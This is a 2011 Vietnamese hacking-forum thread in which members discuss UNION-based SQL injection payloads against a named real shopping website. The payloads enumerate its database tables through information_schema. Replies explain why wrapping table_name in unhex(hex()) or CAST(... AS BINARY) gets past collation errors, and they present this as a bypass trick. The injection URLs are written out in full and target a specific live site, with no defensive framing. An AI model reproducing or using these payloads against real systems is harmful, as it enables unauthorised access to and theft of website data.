| [Question] phải chăng là 1 kiểu bypass SQL injection?? |
19/08/2011 14:42:37 (+0700) | #1 | 245333 |
viet.ict.hut
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 27/04/2010 07:30:53
Messages: 1
Offline
|
|
các bạn ơi cho mình hỏi tại sao trang lỗi này: http://vainham.com
khi mình viết :
http://vainham.com/home/?frame=product_detail&id=-207 UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16 from information_schema.tables--
thì không ra kết quả nào, mà khi viết:
http://vainham.com/home/?frame=product_detail&id=-207 UNION SELECT 1,2,3,4,5,group_concat(unhex(hex(table_name))),7,8,9,10,11,12,13,14,15,16 from information_schema.tables--
thì tuôn ra ào ào.vấn đề này mình không hiểu nổi.mong các bạn giải thích giùm. |
|
|
 |
|
| [Question] phải chăng là 1 kiểu bypass SQL injection?? |
19/08/2011 15:24:03 (+0700) | #2 | 245337 |
mapthulu
Member
|
|
0 |
|
|
Joined: 10/06/2011 12:16:42
Messages: 28
Offline
|
|
Cú pháp ở đoạn 2 buộc các tên bảng phải được dịch sang hex (vì server được cấu hình hiểu hex)
unhex thì giải mã để đưa ra cho người đọc
Nôm na vậy |
|
|
| [Question] phải chăng là 1 kiểu bypass SQL injection?? |
19/08/2011 20:31:10 (+0700) | #3 | 245370 |
![[Avatar]](/hvaonline/images/avatar/1595af6435015c77a7149e92a551338e.jpg "[Avatar]")
|
WinDak
Researcher
|
Joined: 27/01/2002 11:15:00
Messages: 223
Offline
|
|
cái dưới này cũng work  .
-207 UNION SELECT 1,2,3,4,5,group_concat( CAST(table_name AS BINARY) ),7,8,9,10,11,12,13,14,15,16 from information_schema.tables--
cái union có thể bị illegal collation nếu data type không đồng bộ unhex(hex()) là một trick hay để bypass !
|
|
| -- w~ -- |
|
| [Question] phải chăng là 1 kiểu bypass SQL injection?? |
20/08/2011 07:43:32 (+0700) | #4 | 245397 |
mv1098
Member
|
|
0 |
|
|
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
|
|
| Đây không phải là 1 kiểu lỗi, nói đúng hơn là website đó bị dính lỗi SQL injection |
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận thâm nhập
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[Avatar]](/hvaonline/images/avatar/da23de5810e335573c5e0905de70b461.png "[Avatar]")
![[Yahoo!]](/hvaonline/templates/viet/images/icon_yim.gif "[YIM]"){kind=icon}
. Tự tin ghê.![[Avatar]](/hvaonline/images/avatar/05f6cac8859246b13bca3903dfefc986.png "[Avatar]")
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")